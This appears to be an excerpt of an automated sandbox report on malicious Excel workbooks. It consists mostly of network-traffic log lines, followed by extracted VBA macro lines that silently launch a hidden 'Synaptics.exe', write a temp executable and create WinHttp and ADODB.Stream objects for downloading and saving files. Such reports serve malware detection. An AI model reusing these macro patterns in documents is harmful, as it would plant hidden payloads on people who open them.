                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49713 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49715 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49722 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49727 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49728 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49735 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49734 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49738 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49737 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49739 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49740 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49753 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49751 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49760 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49765 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49774 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49779 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49781 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49790 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49792 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49791 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49808 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49810 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49809 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49812 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49833 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49842 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49843 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49846 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49850 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49851 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49852 version: TLS 1.2

                              System Summary

                              barindex
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: I9FyyXRL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
